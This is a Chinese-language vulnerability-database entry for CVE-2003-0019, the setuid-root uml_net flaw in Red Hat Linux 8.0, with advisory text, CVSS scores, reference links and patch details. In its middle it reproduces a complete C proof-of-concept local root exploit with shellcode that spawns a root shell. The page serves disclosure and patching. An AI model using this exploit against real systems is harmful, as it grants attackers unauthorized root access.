CVE-2003-0019
CVSS7.2
发布时间 :2003-02-19 00:00:00
修订时间 :2008-09-10 20:05:23
NMCOES    

[原文]uml_net in the kernel-utils package for Red Hat Linux 8.0 has incorrect setuid root privileges, which allows local users to modify network interfaces, e.g. by modifying ARP entries or placing interfaces into promiscuous mode.


[CNNVD]RedHat Linux User Mode Linux SetUID安装漏洞(CNNVD-200302-045)

        
        RedHat是一款免费开放源代码的Linux操作系统,其中kernel-util包包含多个工具用来控制内核或者机器硬件,Redhat 8.0包含User Mode Linux(UML)工具。
        uml_net工具安装权限不正确,本地攻击者可以利用这个漏洞以高权限执行各种恶意活动。
        RedHat8.0默认包含的kernel-utils包中的uml_net工具不正确地以setuid root属性安装,可允许本地用户利用此工具控制部分网络接口,增加和删除ARP条目和路由,并可以把接口置于混杂模式。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0019
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0019
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200302-045
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/134025
(UNKNOWN)  CERT-VN  VU#134025
http://www.redhat.com/support/errata/RHSA-2003-056.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:056
http://www.iss.net/security_center/static/11276.php
(VENDOR_ADVISORY)  XF  linux-umlnet-gain-privileges(11276)
http://www.securityfocus.com/bid/6801
(UNKNOWN)  BID  6801
http://www.ciac.org/ciac/bulletins/n-044.shtml
(UNKNOWN)  CIAC  N-044

- 漏洞信息

RedHat Linux User Mode Linux SetUID安装漏洞
高危 配置错误
2003-02-19 00:00:00 2005-05-13 00:00:00
本地  
        
        RedHat是一款免费开放源代码的Linux操作系统,其中kernel-util包包含多个工具用来控制内核或者机器硬件,Redhat 8.0包含User Mode Linux(UML)工具。
        uml_net工具安装权限不正确,本地攻击者可以利用这个漏洞以高权限执行各种恶意活动。
        RedHat8.0默认包含的kernel-utils包中的uml_net工具不正确地以setuid root属性安装,可允许本地用户利用此工具控制部分网络接口,增加和删除ARP条目和路由,并可以把接口置于混杂模式。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * chmod -s /usr/bin/uml_net
        厂商补丁:
        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2003:056-08)以及相应补丁:
        RHSA-2003:056-08:Updated kernel-utils packages fix setuid vulnerability
        链接:https://www.redhat.com/support/errata/RHSA-2003-056.html
        补丁下载:
        Red Hat Linux 8.0:
        SRPMS:
        ftp://updates.redhat.com/8.0/en/os/SRPMS/kernel-utils-2.4-8.28.src.rpm
        i386:
        ftp://updates.redhat.com/8.0/en/os/i386/kernel-utils-2.4-8.28.i386.rpm
        可使用下列命令安装补丁:
        rpm -Fvh [文件名]

- 漏洞信息 (22640)

UML_NET Integer Mismanagement Code Execution Vulnerability (EDBID:22640)
linux local
2003-05-23 Verified
0 ktha@hushmail.com
N/A [点击下载]
source: http://www.securityfocus.com/bid/7676/info

A vulnerability has been discovered in uml_net. Due to integer mismanagement while handling version information, it may be possible for an attacker to execute arbitrary code. Specifically, by supplying a negative value within the version information it is possible to bypass various calculations and cause an invalid indexing into an array of functions. As a result, it is possible for an attacker to execute a function in an attacker-controlled location of memory.

Successful exploitation of this vulnerability would allow an attacker to execute arbitrary commands with the privileges of uml_net, possibly root. 

/*
  uml_net proof of concept exploit 
  
  Tested on: RH 8.0 with default uml_utilities from kernel-utils-2.4-8.13 
             RH 8.0 with binary from uml_utilities_20030312, uml_utilities_20020821
  It may work on other linux distributions 
  
  Author: ktha@hushmail.com
  Based on the bug that I found in uml_net.c on 23.05.2003
  
  Greets: M|G - no1 keep up the good work
  	  securitech guys, security-corp guys - thx for the challenges
  	  all of you who support me in real life 
  
*/


#include <stdio.h>

#define SHELL 0xbffffdd7
#define ROT -302068188

char *
gen (int pad)
{
  int i, size;
  char *p;
  char shellcode[] = "\x31\xc0"	// xorl    %eax,%eax
    "\x31\xdb"			// xorl    %ebx,%ebx
    "\xb0\x17"			// movb    $0x17,%al
    "\xcd\x80"			// int     $0x80
    "\xeb\x18"			// jmp     end
    				// start:
    "\x5e"			// popl    %esi
    "\x89\x76\x08"		// movl    %esi,0x8(%esi)
    "\x31\xc0"			// xorl    %eax,%eax
    "\x88\x46\x07"		// movb    %eax,0x7(%esi)
    "\x89\x46\x0c"		// movl    %eax,0xc(%esi)
    "\xb0\x0b"			// movb    $0xb,%al
    "\x89\xf3"			// movl    %esi,%ebx
    "\x8d\x4e\x08"		// leal    0x8(%esi),%ecx
    "\x8d\x56\x0c"		// leal    0xc(%esi),%edx
    "\xcd\x80"			// int     $0x80
    				// end:
    "\xe8\xe3\xff\xff\xff"	// call    start
    "\x2f\x62\x69\x6e\x2f\x73\x68";	// .string "/bin/sh"


  size = sizeof (shellcode);
  p = (char *) malloc (5000 + size + 1);
  memset (p, 0x90, 5000);
  for (i = 1; i < 1000; i++)
    *(int *) (p + 4 * i + pad) = SHELL;
  memcpy (p + 5000, shellcode, size + 1);
  *p = "SM00NY=";
  return p;
}

void
usage (char *sir)
{
  printf ("\nUsage: %s <UML_NET> [pad]\n\n", sir);
  printf ("Pad value: 0 - 3\nDefault: 0\n");
  printf ("\n");
}
main (int argc, char **argv)
{
  unsigned long pad = 0;
  int loop;
  char s[1000];
  char *nume[4], *pume[2];

  if (argc < 2)
    {
      usage (argv[0]);
      exit (0);
    }

  if (argv[2])
    pad = atoi (argv[2]);

  sprintf (s, "%d", ROT);

  nume[0] = argv[1];
  nume[1] = s;
  nume[2] = "add";
  nume[3] = NULL;

  pume[0] = gen (pad);
  pume[1] = NULL;

  printf ("Trying to exploit.... pad value: %d\n", pad);
  printf ("If you get a segfault, try to change the pad value !\n");

  execve (nume[0], nume, pume);
}
		

- 漏洞信息

4926
Red Hat Linux kernel_utils uml_net Overflow
Local Access Required Input Manipulation, Misconfiguration
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A local overflow exists in uml_net from kernel-utils. The uml_net fails to properly check bounds resulting in an integer overflow. With a specially crafted request, an attacker can cause an overflow resulting in a loss of confidentiality, integrity, and/or availability. Note that this would not normally be an issue, but this version of kernel-utils installs umn_net as setuid root.

- 时间线

2003-05-23 Unknow
2003-09-28 Unknow

- 解决方案

Upgrade to kernel-utils version 2.4-8.28 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): chmod -s /usr/bin/uml_net

- 相关参考

- 漏洞作者

- 漏洞信息

Red Hat Linux User Mode Linux SetUID Installation Vulnerability
Configuration Error 6801
No Yes
2003-02-07 12:00:00 2009-07-11 08:06:00
Discovery credited to Johnny Robertson.

- 受影响的程序版本

RedHat Linux 8.0 i386

- 漏洞讨论

It has been reported that under some circumstances, Red Hat Linux may allow unauthorized actions through User-Mode-Linux compatibility. Due to permissions on some components installed with the User-Mode-Linux utilities, a local user could perform actions on the system that require privilege, potentially affecting local host security.

- 漏洞利用

No exploit is required for this vulnerability.

- 解决方案

Fixes that correct this issue have been released:


RedHat Linux 8.0 i386

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站